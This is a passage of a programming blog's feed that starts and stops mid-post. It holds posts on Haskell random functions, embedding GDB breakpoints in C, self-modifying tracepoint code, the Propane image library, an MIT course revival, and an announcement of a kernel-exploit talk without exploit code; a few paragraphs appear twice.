contain pointers to anything not shared by the two processes. 
This means we can't send continuations through other continuations, sad to say.</p></li><li><p>I left out the error handling you would expect in serious code, because this is anything but.</p></li><li><p>Likewise, I'm assuming that a single <code>write</code> and <code>read</code> will suffice to send the value. Robust code will need to loop until completion, handle <code>EINTR</code>, etc. Or use some higher-level IPC mechanism.</p></li><li><p>At some size, stack-allocating the receive buffer will become a problem.</p></li> <li><p>It's slow. Well, actually, I'm impressed with the speed of <code>fork</code> on Linux. My machine solves both backtracking problems in about a second, <code>fork</code>ing about 2000 processes along the way. You can speed it up more with <a href="http://9fans.net/archive/2009/02/422">static linking</a>. But it's still far more overhead than the alternatives.</p></li></ul><p>As usual, you can get the code from <a href="https://github.com/kmcallister/cccallcc">GitHub</a>.</p>http://mainisusuallyafunction.blogspot.com/2012/02/continuations-in-c-with-fork.htmlnoreply@blogger.com (keegan)5tag:blogger.com,1999:blog-1563623855220143059.post-3013561900404693703Thu, 02 Feb 2012 21:24:00 +00002012-02-02T13:35:21.740-08:00codecomputabilityhaskellrandomGenerating random functions<p>How can we pick a random Haskell function? 
Specifically, we want to write an IO action</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">randomFunction </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>)</code></pre><p>with this behavior:</p><ul class="incremental"><li><p>It produces a function of type <code>Integer -&gt; Bool</code>.</p></li><li><p>It always produces a total function — a function which never throws an exception or enters an infinite loop.</p></li><li><p>It is equally likely to produce <em>any</em> such function.</p></li></ul><p>This is tricky, because there are infinitely many such functions (more on that later).</p><p>In another language we might produce something which looks like a function, but actually flips a coin on each new integer input. It would use mutable state to remember previous results, so that future calls will be consistent. But the Haskell type we gave for <code>randomFunction</code> forbids this approach. <code>randomFunction</code> uses IO effects to pick a random function, but the function it picks has access to neither coin flips nor mutable state.</p><p>Alternatively, we could build a lazy infinite data structure containing all the <code>Bool</code> answers we need. <code>randomFunction</code> could generate an <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/random-1.0.0.3/System-Random.html#v:randomRs">infinite list of random <code>Bool</code>s</a>, and produce a function <code>f</code> which indexes into that list. But this indexing will be inefficient in space and time. If the user calls <code>(f 10000000)</code>, we'll have to run 10,000,000 steps of the pseudo-random number generator, and build 10,000,000 list elements, before we can return a single <code>Bool</code> result.</p><p>We can improve this considerably by using a different infinite data structure. 
Though our solution is pure functional code, we <em>do</em> end up relying on mutation — the implicit mutation by which lazy thunks become evaluated data.</p><h1 id="the-data-structure">The data structure</h1><p></p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">System.Random</span><br /><span class="kw">import</span> <span class="dt">Data.List</span> ( genericIndex )</code></pre><p>Our data structure is an infinite binary tree:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">data</span> <span class="dt">Tree</span> <span class="fu">=</span> <span class="dt">Node</span> <span class="dt">Bool</span> <span class="dt">Tree</span> <span class="dt">Tree</span></code></pre><p>We can interpret such a tree as a function from non-negative <code>Integer</code>s to <code>Bool</code>s. If the <code>Integer</code> argument is zero, the root node holds our <code>Bool</code> answer. Otherwise, we shift off the least-significant bit of the argument, and look at the left or right subtree depending on that bit.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">get </span><span class="ot">::</span> <span class="dt">Tree</span> <span class="ot">-&gt;</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>)<br />get (<span class="dt">Node</span> b _ _) <span class="dv">0</span> <span class="fu">=</span> b<br />get (<span class="dt">Node</span> _ x y) n <span class="fu">=</span><br /> <span class="kw">case</span> <span class="fu">divMod</span> n <span class="dv">2</span> <span class="kw">of</span><br /> (m, <span class="dv">0</span>) <span class="ot">-&gt;</span> get x m<br /> (m, _) <span class="ot">-&gt;</span> get y m</code></pre><p>Now we need to build a suitable tree, starting from a <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/random-1.0.0.3/System-Random.html#t:StdGen">random number generator 
state</a>. The standard <code>System.Random</code> module is not going to win any <a href="http://www.serpentine.com/blog/2009/09/19/a-new-pseudo-random-number-generator-for-haskell/">speed contests</a>, but it does have one extremely nice property: it supports an operation</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">split </span><span class="ot">::</span> <span class="dt">StdGen</span> <span class="ot">-&gt;</span> (<span class="dt">StdGen</span>, <span class="dt">StdGen</span>)</code></pre><p>The two generator states returned by <code>split</code> will (ideally) produce two independent streams of random values. We use <code>split</code> at each node of the infinite tree.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">build </span><span class="ot">::</span> <span class="dt">StdGen</span> <span class="ot">-&gt;</span> <span class="dt">Tree</span><br />build g0 <span class="fu">=</span><br /> <span class="kw">let</span> (b, g1) <span class="fu">=</span> random g0<br /> (g2, g3) <span class="fu">=</span> split g1<br /> <span class="kw">in</span> <span class="dt">Node</span> b (build g2) (build g3)</code></pre><p>This is a recursive function with no base case. Conceptually, it produces an infinite tree. Operationally, it produces a single <code>Node</code> constructor, whose fields are lazily-deferred computations. As <code>get</code> explores this notional infinite tree, new <code>Node</code>s are created and randomness generated on demand.</p><p><code>get</code> traverses one level per bit of its input integer. So looking up the integer <em>n</em> involves traversing and possibly creating <span style="white-space: nowrap;"><em>O</em>(log <em>n</em>)</span> nodes. This suggests good space and time efficiency, though only testing will say for sure.</p><p>Now we have all the pieces to solve the original puzzle. 
We build two trees, one to handle positive numbers and another for negative numbers.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">randomFunction </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>)<br />randomFunction <span class="fu">=</span> <span class="kw">do</span><br /> neg <span class="ot">&lt;-</span> build <span class="ot">`fmap`</span> newStdGen<br /> pos <span class="ot">&lt;-</span> build <span class="ot">`fmap`</span> newStdGen<br /> <span class="kw">let</span> f n <span class="fu">|</span> n <span class="fu">&lt;</span> <span class="dv">0</span> <span class="fu">=</span> get neg (<span class="fu">-</span>n)<br /> <span class="fu">|</span> <span class="fu">otherwise</span> <span class="fu">=</span> get pos n<br /> <span class="fu">return</span> f</code></pre><p></p><h1 id="testing">Testing</h1><p>Here's some code which helps us visualize one of these functions in the vicinity of zero:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">test </span><span class="ot">::</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>) <span class="ot">-&gt;</span> <span class="dt">IO</span> ()<br />test f <span class="fu">=</span> <span class="fu">putStrLn</span> <span class="fu">$</span> <span class="fu">map</span> (char <span class="fu">.</span> f) [<span class="fu">-</span><span class="dv">40</span><span class="fu">..</span><span class="dv">40</span>] <span class="kw">where</span><br /> char <span class="dt">False</span> <span class="fu">=</span> <span class="ch">' '</span><br /> char <span class="dt">True</span> <span class="fu">=</span> <span class="ch">'-'</span></code></pre><p>Now we can test <code>randomFunction</code> in GHCi:</p><pre><code><span class="Prompt">λ&gt;</span> <span class="Entry">randomFunction &gt;&gt;= test</span><br />---- - --- - - - - -- - 
- - -- --- -- -- - -- - - -- --- --<br /><span class="Prompt">λ&gt;</span> <span class="Entry">randomFunction &gt;&gt;= test</span><br />- ---- - - - - - - -- - - --- --- -- - -- - -- - - - - - -- - <br /><span class="Prompt">λ&gt;</span> <span class="Entry">randomFunction &gt;&gt;= test</span><br />- --- - - - -- --- - -- - - - - - ---- - - --- - - -<br /></code></pre><p>Each result from <code>randomFunction</code> is indeed a function: it always gives the same output for a given input. This much should be clear from the fact that we haven't used any <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/base-4.3.1.0/System-IO-Unsafe.html">unsafe shenanigans</a>. But we can also demonstrate it empirically:</p><pre><code><span class="Prompt">λ&gt;</span> <span class="Entry">f &lt;- randomFunction</span><br /><span class="Prompt">λ&gt;</span> <span class="Entry">test f</span><br />- ----- - - -- - - --- -- - - - - - - -- - - ---- - - - - - --- <br /><span class="Prompt">λ&gt;</span> <span class="Entry">test f</span><br />- ----- - - -- - - --- -- - - - - - - -- - - ---- - - - - - --- <br /></code></pre><p>Let's also test the speed on some very large arguments:</p><pre><code><span class="Prompt">λ&gt;</span> <span class="Entry">:set +s</span><br /><span class="Prompt">λ&gt;</span> <span class="Entry">f 10000000</span><br />True<br />(0.03 secs, 12648232 bytes)<br /><span class="Prompt">λ&gt;</span> <span class="Entry">f (2^65536)</span><br />True<br />(1.10 secs, 569231584 bytes)<br /><span class="Prompt">λ&gt;</span> <span class="Entry">f (2^65536)</span><br />True<br />(0.26 secs, 426068040 bytes)<br /></code></pre><p>The second call with <code>2^65536</code> is faster because the tree nodes already exist in memory. 
We can expect our tests to be faster yet if we compile with <code>ghc -O</code> rather than using GHCi's bytecode interpreter.</p><h1 id="how-many-functions">How many functions?</h1><p>Assume we have infinite memory, so that <code>Integer</code>s really can be unboundedly large. And let's ignore negative numbers, for simplicity. How many total functions of type <code>Integer -&gt; Bool</code> are there?</p><p>Suppose we made an infinite list <code>xs</code> of all such functions. Now consider this definition:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">diag </span><span class="ot">::</span> [<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>] <span class="ot">-&gt;</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>)<br />diag xs n <span class="fu">=</span> <span class="fu">not</span> <span class="fu">$</span> genericIndex xs n n</code></pre><p>For an argument <code>n</code>, <code>diag xs</code> looks at what the <code>n</code>th function of <code>xs</code> would return, and returns the opposite. This means the function <code>diag xs</code> differs from every function in our supposedly comprehensive list of functions. This contradiction shows that there are <a href="http://en.wikipedia.org/wiki/Uncountable_set">uncountably many</a> total functions of type <code>Integer -&gt; Bool</code>. It's closely related to <a href="http://en.wikipedia.org/wiki/Cantor%27s_diagonal_argument">Cantor's diagonal argument</a> that the real numbers are uncountable.</p><p>But wait, there are only countably many Haskell programs! In fact, you can encode each one as a number. There may be uncountably many functions, but there are only a countable number of <em>computable</em> functions. 
So the proof breaks down if you restrict it to a real programming language like Haskell.</p><p>In that context, the existence of <code>xs</code> implies that there is some <em>algorithm</em> to enumerate the computable total functions. This is the assumption we ultimately contradict. The set of computable total functions is not <a href="http://en.wikipedia.org/wiki/Recursively_enumerable_language">recursively enumerable</a>, even though it is countable. Intuitively, to produce a single element of this set, we would have to verify that the function halts on every input, which is <a href="http://en.wikipedia.org/wiki/Halting_problem">impossible in the general case</a>.</p><p>Now let's revisit <code>randomFunction</code>. Any function it produces is computable: the algorithm is a combination of the pseudo-random number procedure and our tree traversal. In this sense, <code>randomFunction</code> provides extremely poor randomness; it only selects values from a particular <a href="http://en.wikipedia.org/wiki/Null_set">measure zero</a> subset of its result type! 
But if you read the type constructor <code>(-&gt;)</code> as &quot;computable function&quot;, as one should in a programming language, then <code>randomFunction</code> is closer to doing what it says it does.</p><p><strong>Edit:</strong> See also Luke Palmer's <a href="http://lukepalmer.wordpress.com/2012/01/26/computably-uncountable/">recent article on this subject</a>.</p> <h1 id="see-also">See also</h1><p>The libraries <a href="http://hackage.haskell.org/package/data-memocombinators">data-memocombinators</a> and <a href="http://hackage.haskell.org/package/MemoTrie">MemoTrie</a> use similar structures, not for building random functions but for <a href="http://en.wikipedia.org/wiki/Memoization">memoizing</a> existing ones.</p><p>You can download this post as a <a href="https://github.com/kmcallister/blog-misc/blob/master/random-function/random-function.lhs">Literate Haskell file</a> and play with the code.</p>http://mainisusuallyafunction.blogspot.com/2012/02/generating-random-functions.htmlnoreply@blogger.com (keegan)1tag:blogger.com,1999:blog-1563623855220143059.post-8551602144136131794Sat, 28 Jan 2012 17:02:00 +00002012-01-28T09:02:23.660-08:00codekernelsecurityslidessystemsWriting kernel exploits<p>Yesterday I gave a talk about writing kernel exploits. I've posted the <a href="http://ugcs.net/~keegan/talks/kernel-exploit/talk.pdf">slides [PDF]</a>. Here is the original description:</p><blockquote><p>Did you know that a NULL pointer can compromise your entire system? Do you know how UNIX pipes, multithreading, and an obscure network protocol from 1981 are combined to take over Linux machines today? OS kernels are full of strange and interesting vulnerabilities, thanks to the subtle nature of systems code. And the kernel's ultimate authority is the ultimate prize for an attacker.</p><p>In this talk you will learn how kernel exploits work, with detailed code examples. 
Compared to userspace, exploiting the kernel requires a whole different bag of tricks, and we'll cover some of the most important ones. We will focus on Linux systems and x86 hardware, though most ideas will generalize. We'll start with a few toy examples, then look at some real, high-profile Linux exploits from the past two years.</p><p>You will also see how to protect your own Linux machines against kernel exploits. We'll talk about the continual cat-and-mouse game between system administrators and those who would attack even hardened kernels.</p></blockquote><p>Thanks again to <a href="http://sipb.mit.edu/">SIPB</a> for giving me a venue to talk about whatever I find interesting.</p>http://mainisusuallyafunction.blogspot.com/2012/01/writing-kernel-exploits.htmlnoreply@blogger.com (keegan)5tag:blogger.com,1999:blog-1563623855220143059.post-3687144062173092177Thu, 19 Jan 2012 17:51:00 +00002012-01-19T09:51:52.208-08:00ccodedebugginggdbEmbedding GDB breakpoints in C source code<p>Have you ever wanted to embed <a href="http://www.gnu.org/software/gdb/">GDB</a> breakpoints in C source code?</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">int</span> main() {<br /> printf(<span class="st">&quot;Hello,</span><span class="ch">\n</span><span class="st">&quot;</span>);<br /> EMBED_BREAKPOINT;<br /> printf(<span class="st">&quot;world!</span><span class="ch">\n</span><span class="st">&quot;</span>);<br /> EMBED_BREAKPOINT;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}</code></pre><p>One way is to directly insert your CPU's breakpoint instruction. On x86:</p><pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define EMBED_BREAKPOINT</span> <span class="kw">asm</span> <span class="kw">volatile</span> (<span class="st">&quot;int3;&quot;</span>)</code></pre><p>There are at least two problems with this approach:</p><ul class="incremental"><li><p>They aren't real GDB breakpoints. 
You can't <code>disable</code> them, count how many times they've been hit, etc.</p></li><li><p>If you run the program outside GDB, the breakpoint instruction will crash your process.</p></li></ul><p>Here is a small hack which solves both problems:</p><pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define EMBED_BREAKPOINT</span> \<br /> <span class="kw">asm</span>(<span class="st">&quot;0:&quot;</span> \<br /> <span class="st">&quot;.pushsection embed-breakpoints;&quot;</span> \<br /> <span class="st">&quot;.quad 0b;&quot;</span> \<br /> <span class="st">&quot;.popsection;&quot;</span>)</code></pre><p>We place a <a href="http://sourceware.org/binutils/docs-2.21/as/Symbol-Names.html#index-local-labels-217">local label</a> into the instruction stream, and then save its address in the <code>embed-breakpoints</code> linker section.</p><p>Then we need to convert these addresses into GDB <code>breakpoint</code> commands. I wrote a tool that does this, as a wrapper for the <code>gdb</code> command. 
Here's how it works, on our initial example:</p><pre><code><span class="Prompt">$</span> <span class="Entry">gcc -g -o example example.c</span><br /><br /><span class="Prompt">$</span> <span class="Entry">./gdb-with-breakpoints ./example</span><br />Reading symbols from example...done.<br />Breakpoint 1 at 0x4004f2: file example.c, line 8.<br />Breakpoint 2 at 0x4004fc: file example.c, line 10.<br /><span class="Prompt">(gdb)</span> <span class="Entry">run</span><br />Starting program: example <br />Hello,<br /><br />Breakpoint 1, main () at example.c:8<br />8 printf(&quot;world!\n&quot;);<br /><span class="Prompt">(gdb)</span> <span class="Entry">info breakpoints</span><br />Num Type Disp Enb Address What<br />1 breakpoint keep y 0x00000000004004f2 in main at example.c:8<br /> breakpoint already hit 1 time<br />2 breakpoint keep y 0x00000000004004fc in main at example.c:10<br /></code></pre><p>If we run the program normally, or in GDB without the wrapper, the <code>EMBED_BREAKPOINT</code> statements do nothing. The breakpoint addresses aren't even loaded into memory, because the <code>embed-breakpoints</code> section is not marked as <a href="http://sourceware.org/binutils/docs/as/Section.html#index-Section-Stack-443">allocatable</a>.</p><p>You can find all of the code <a href="https://github.com/kmcallister/embedded-breakpoints">on GitHub</a> under a BSD license. I've done only minimal testing, but I hope it will be a useful debugging tool for someone. Let me know if you find any bugs or improvements. You can comment here, or find my email address on GitHub.</p><p>I'm not sure about the decision to write the GDB wrapper in C using <a href="http://sourceware.org/binutils/docs/bfd/">BFD</a>. I also considered Haskell and <a href="http://hackage.haskell.org/package/elf"><code>elf</code></a>, or Python and the new <a href="http://eli.thegreenplace.net/2012/01/06/pyelftools-python-library-for-parsing-elf-and-dwarf/">pyelftools</a>. 
One can probably do something nicer using the GDB <a href="http://sourceware.org/gdb/onlinedocs/gdb/Python.html">Python API</a>, which was added <a href="http://lwn.net/Articles/356044/">a few years ago</a>.</p><p>This code depends on a GNU toolchain: it uses GNU C extensions, GNU assembler syntax, and BFD. The GDB wrapper uses the Linux <a href="http://www.kernel.org/doc/man-pages/online/pages/man5/proc.5.html"><code>proc</code> filesystem</a>, so that it can pass to GDB a temporary file which has already been <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/unlink.2.html">unlinked</a>. You could port it to other UNIX systems by changing the tempfile handling. It should work on a variety of CPU architectures, but I've only tested it on 32- and 64-bit x86.</p>http://mainisusuallyafunction.blogspot.com/2012/01/embedding-gdb-breakpoints-in-c-source.htmlnoreply@blogger.com (keegan)19tag:blogger.com,1999:blog-1563623855220143059.post-4245608045489331087Tue, 10 Jan 2012 06:41:00 +00002012-01-10T01:04:00.829-08:006.S184compscimitZombie 6.001 starts tomorrow!<p>The <a href="http://web.mit.edu/alexmv/6.S184/">student-run revival</a> of MIT's <a href="http://sicp.csail.mit.edu/Spring-2007/">famous intro CS class</a> starts tomorrow! 6.001 and its text <a href="http://mitpress.mit.edu/sicp/full-text/book/book.html"><em>SICP</em></a> had a singular influence on the teaching of introductions to computer science — not to be confused with intro to programming, worthwhile though that subject may be. After the unfortunate demise of 6.001 at MIT, some former TAs reanimated the class as an intense four-week experience. As <a href="http://web.mit.edu/alexmv/6.S184/">their description</a> says:</p><blockquote><p>Zombie-like, 6.001 rises from the dead to threaten students again. Unlike a zombie, though, it's moving quite a bit faster than it did the first time. 
Like the original, don't walk into the class expecting that it will teach you Scheme; instead, it attempts to teach thought patterns for computer science, and the structure and interpretation of computer programs. Three projects will be assigned and graded. Prereq: some programming experience; high confusion threshold.</p></blockquote><p>I'm helping teach it this year, and it should be a lot of fun. You can <a href="http://web.mit.edu/alexmv/6.S184/">follow along online</a> or, if you're in the area, come to lectures Tuesdays and Thursdays, 19:00 to 21:00 in 32-044 (that's MIT building 32, room 044).</p>http://mainisusuallyafunction.blogspot.com/2012/01/zombie-6001-starts-tomorrow.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-8375049702846544984Thu, 22 Dec 2011 00:59:00 +00002011-12-21T16:59:42.185-08:00codegraphicshaskellimadethispropanePropane: Functional synthesis of images and animations in Haskell<p>I just released <a href="http://hackage.haskell.org/package/propane">Propane</a>, a Haskell library for functional synthesis of images and animations. This is a generalization of my <a href="http://repa.ouroborus.net/">Repa</a>-based <a href="http://mainisusuallyafunction.blogspot.com/2011/10/quasicrystals-as-sums-of-waves-in-plane.html">quasicrystal code</a>.</p><p>It's based on the same ideas as <a href="http://conal.net/Pan/">Pan</a> and some other projects. An image is a function assigning a color to each point in the plane. Similarly, an animation assigns an image to each point in time. 
Like the original, don't walk into the class expecting that it will teach you Scheme; instead, it attempts to teach thought patterns for computer science, and the structure and interpretation of computer programs. Three projects will be assigned and graded. Prereq: some programming experience; high confusion threshold.</p></blockquote><p>I'm helping teach it this year, and it should be a lot of fun. You can <a href="http://web.mit.edu/alexmv/6.S184/">follow along online</a> or, if you're in the area, come to lectures Tuesdays and Thursdays, 19:00 to 21:00 in 32-044 (that's MIT building 32, room 044).</p>http://mainisusuallyafunction.blogspot.com/2012/01/zombie-6001-starts-tomorrow.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-8375049702846544984Thu, 22 Dec 2011 00:59:00 +00002011-12-21T16:59:42.185-08:00codegraphicshaskellimadethispropanePropane: Functional synthesis of images and animations in Haskell<p>I just released <a href="http://hackage.haskell.org/package/propane">Propane</a>, a Haskell library for functional synthesis of images and animations. This is a generalization of my <a href="http://repa.ouroborus.net/">Repa</a>-based <a href="http://mainisusuallyafunction.blogspot.com/2011/10/quasicrystals-as-sums-of-waves-in-plane.html">quasicrystal code</a>.</p><p>It's based on the same ideas as <a href="http://conal.net/Pan/">Pan</a> and some other projects. An image is a function assigning a color to each point in the plane. Similarly, an animation assigns an image to each point in time. 
Haskell's tools for functional and declarative programming can be used directly on images and animations.</p><p>For example, you can draw a red-green gradient like so:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">Propane</span><br /><br />main <span class="fu">=</span> saveImage <span class="st">&quot;out.png&quot;</span> (<span class="dt">Size</span> <span class="dv">400</span> <span class="dv">400</span>) im <span class="kw">where</span><br /> im (x,y) <span class="fu">=</span> cRGB (unbal x) (unbal y) <span class="dv">0</span></code></pre><p>Here <code>im</code> is the image as a function, mapping an (<em>x</em>,<em>y</em>) coordinate to a color. <code>unbal</code> is a function provided by Propane, which just maps the interval [-1, 1] to [0, 1].</p><p>The source package includes an animated quasicrystal and several other <a href="https://github.com/kmcallister/propane/tree/master/examples">examples</a>. Propane uses <a href="http://repa.ouroborus.net/">Repa</a> for data-parallel array computations. That means it automatically uses multiple CPU cores for rendering, provided the program is compiled and run with threads enabled. That said, it's not yet been optimized for speed in other ways.</p><p>This is just a toy right now, but do let me know if you come up with cool enhancements or examples!</p>http://mainisusuallyafunction.blogspot.com/2011/12/propane-functional-synthesis-of-images.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-6481800066023872533Mon, 07 Nov 2011 13:39:00 +00002011-11-07T05:53:21.824-08:00ccodedonttrythisathometracepointsSelf-modifying code for debug tracing in quasi-C<p>Printing a program's state as it runs is the simple but effective debugging tool of programmers everywhere. For efficiency, we usually disable the most verbose output in production. But sometimes you need to diagnose a problem in a deployed system. 
It would be convenient to declare &quot;tracepoints&quot; and enable them at runtime, like so:</p><pre class="sourceCode"><code class="sourceCode c">tracepoint foo_entry;<br /><br /><span class="dt">int</span> foo(<span class="dt">int</span> n) {<br /> TRACE(foo_entry, <span class="st">&quot;called foo(%d)</span><span class="ch">\n</span><span class="st">&quot;</span>, n);<br /> <span class="co">// ...</span><br />}<br /><br /><span class="co">// Called from UI, monitoring interface, etc.</span><br /><span class="dt">void</span> debug_foo() {<br /> enable(&amp;foo_entry);<br />}</code></pre><p>Here's a simple implementation of this API:</p><pre class="sourceCode"><code class="sourceCode c"><span class="kw">typedef</span> <span class="dt">int</span> tracepoint;<br /><br /><span class="ot">#define TRACE(_point, _args...) \<br /> do { \<br /> if (_point) printf(_args); \<br /> } while (0)</span><br /><br /><span class="dt">static</span> <span class="kw">inline</span> <span class="dt">void</span> enable(tracepoint *point) {<br /> *point = <span class="dv">1</span>;<br />}</code></pre><p>Each tracepoint is simply a global variable. The construct <code>do { ... } while (0)</code> is a standard trick to make macro-expanded code play nicely with its surroundings. We also use GCC's syntax for <a href="http://gcc.gnu.org/onlinedocs/gcc/Variadic-Macros.html#Variadic-Macros">macros with a variable number of arguments</a>.</p><p>This approach does introduce a bit of overhead. One concern is that reading a global variable will cause a cache miss and will also evict a line of useful data from the cache. There's also some impact from adding a branch instruction. We'll develop a significantly more complicated implementation which avoids both of these problems.</p><p>Our new solution will be specific to <a href="http://en.wikipedia.org/wiki/X86-64">x86-64</a> processors running Linux, though the idea can be ported to other platforms. 
This approach is inspired by various self-modifying-code schemes in the Linux kernel, such as <a href="http://lwn.net/Articles/343766/">ftrace</a>, <a href="http://lwn.net/Articles/132196/">kprobes</a>, <a href="http://lwn.net/Articles/245671/">immediate values</a>, etc. It's mostly intended as an example of how these tricks work. The code in this article is not production-ready.</p><h1 id="the-design">The design</h1><p>Our new <code>TRACE</code> macro will produce code like the following pseudo-assembly:</p><pre class="sourceCode"><code class="sourceCode nasm"><span class="fu">foo:</span><br /> ...<br /> <span class="co">; code before tracepoint</span><br /> ...<br /><span class="fu">tracepoint:</span><br /> <span class="kw">nop</span><br /><span class="fu">after_tracepoint:</span><br /> ...<br /> <span class="co">; rest of function</span><br /> ...<br /> <span class="kw">ret</span><br /><br /><span class="fu">do_tracepoint:</span><br /> <span class="kw">push</span> args to printf<br /> <span class="kw">call</span> printf<br /> <span class="kw">jmp</span> after_tracepoint</code></pre><p>In the common case, the tracepoint is disabled, and the overhead is only a single <a href="http://en.wikipedia.org/wiki/NOP"><code>nop</code></a> instruction. To enable the tracepoint, we replace the <code>nop</code> instruction in memory with <code>jmp do_tracepoint</code>.</p><h1 id="the-trace-macro">The <code>TRACE</code> macro</h1><p>Our <code>nop</code> instruction needs to be big enough that we can overwrite it with an unconditional jump. On x86-64, the standard <code>jmp</code> instruction has a 1-byte opcode and a 4-byte signed relative displacement, so we need a 5-byte <code>nop</code>. Five one-byte <code>0x90</code> instructions would work, but a single five-byte instruction will consume fewer CPU resources. 
Finding the best way to do nothing is actually rather difficult, but the Linux kernel has already compiled a list of <a href="http://lxr.linux.no/linux+v3.1/arch/x86/include/asm/nops.h">favorite nops</a>. We'll use this one:</p><pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define NOP5 </span><span class="ot">&quot;.byte 0x0f, 0x1f, 0x44, 0x00, 0x00;&quot;</span></code></pre><p>Let's check this instruction using <a href="http://udis86.sourceforge.net/"><code>udcli</code></a>:</p><pre><code><span class="Prompt">$</span> <span class="Entry">echo 0f 1f 44 00 00 | udcli -x -64 -att</span><br />0000000000000000 0f1f440000 nop 0x0(%rax,%rax)<br /></code></pre><p>GCC's <a href="http://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html#Extended-Asm">extended inline assembly</a> lets us insert arbitrarily bizarre assembly code into a normal C program. We'll use the <a href="http://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html#Extended-asm-with-goto"><code>asm goto</code></a> flavor, new in GCC 4.5, so that we can pass C labels into our assembly code. (The tracing use case inspired the <code>asm goto</code> feature, and my macro is adapted from an example in the GCC manual.)</p><p>Here's how it looks:</p><pre class="sourceCode"><code class="sourceCode c"><span class="kw">typedef</span> <span class="dt">int</span> tracepoint;<br /><br /><span class="ot">#define TRACE(_point, _args...) 
\<br /> do { \<br /> asm goto ( \<br /> &quot;0: &quot; NOP5 \<br /> &quot;.pushsection trace_table, \&quot;a\&quot;;&quot; \<br /> &quot;.quad &quot; #_point &quot;, 0b, %l0;&quot; \<br /> &quot;.popsection&quot; \<br /> : : : : __lbl_##_point); \<br /> if (0) { \<br /> __lbl_##_point: printf(_args); \<br /> } \<br /> } while (0)</span></code></pre><p>We use the <a href="http://gcc.gnu.org/onlinedocs/cpp/Stringification.html">stringify</a> and <a href="http://gcc.gnu.org/onlinedocs/cpp/Concatenation.html">concat</a> macro operators, and rely on the gluing together of adjacent string literals. A call like this:</p><pre class="sourceCode"><code class="sourceCode c">TRACE(foo_entry, <span class="st">&quot;called foo(%d)</span><span class="ch">\n</span><span class="st">&quot;</span>, n);</code></pre><p>will produce the following code:</p><pre class="sourceCode"><code class="sourceCode c"> <span class="kw">do</span> {<br /> <span class="kw">asm</span> <span class="kw">goto</span> (<br /> <span class="st">&quot;0: .byte 0x0f, 0x1f, 0x44, 0x00, 0x00;&quot;</span><br /> <span class="st">&quot;.pushsection trace_table, </span><span class="ch">\&quot;</span><span class="st">a</span><span class="ch">\&quot;</span><span class="st">;&quot;</span><br /> <span class="st">&quot;.quad foo_entry, 0b, %l0;&quot;</span><br /> <span class="st">&quot;.popsection&quot;</span><br /> : : : : __lbl_foo_entry);<br /> <span class="kw">if</span> (<span class="dv">0</span>) {<br /> __lbl_foo_entry: printf(<span class="st">&quot;called foo(%d)</span><span class="ch">\n</span><span class="st">&quot;</span>, n);<br /> }<br /> } <span class="kw">while</span> (<span class="dv">0</span>);</code></pre><p>Besides emitting the <code>nop</code> instruction, we write three 64-bit values (&quot;<code>quad</code>s&quot;). They are, in order:</p><ul class="incremental"><li>The address of the <code>tracepoint</code> variable declared by the user. We never actually read or write this variable. 
We're just using its address as a unique key.</li><li>The address of the <code>nop</code> instruction, by way of a <a href="http://sourceware.org/binutils/docs-2.21/as/Symbol-Names.html#index-local-labels-217">local assembler label</a>.</li><li>The address of the C label for our <code>printf</code> call, as passed to <code>asm goto</code>.</li></ul><p>This is the information we need in order to patch in a <code>jmp</code> at runtime. The <a href="http://sourceware.org/binutils/docs-2.21/as/PushSection.html"><code>.pushsection</code></a> directive makes the assembler write into the <code>trace_table</code> <a href="http://sourceware.org/binutils/docs-2.21/as/Secs-Background.html">section</a> without disrupting the normal flow of code and data. The <code>&quot;a&quot;</code> <a href="http://sourceware.org/binutils/docs/as/Section.html#index-Section-Stack-443">section flag</a> marks these bytes as &quot;allocatable&quot;, i.e. something we actually want available at runtime.</p><p>We count on GCC's optimizer to notice that the condition <code>0</code> is unlikely to be true, and therefore move the <code>if</code> body to the end of the function. It's still considered reachable due to the label passed to <code>asm goto</code>, so it will not fall victim to dead code elimination.</p><h1 id="the-linker-script">The linker script</h1><p>We have to collect all of these <code>trace_table</code> records, possibly from multiple source files, and put them somewhere for use by our C code. We'll do this with the following <a href="http://sourceware.org/binutils/docs/ld/Scripts.html#Scripts">linker script</a>:</p><pre><code>SECTIONS {<br /> trace_table : {<br /> trace_table_start = .;<br /> *(trace_table)<br /> trace_table_end = .;<br /> }<br />}<br /></code></pre><p>This concatenates all <code>trace_table</code> sections into a single section in the resulting binary. 
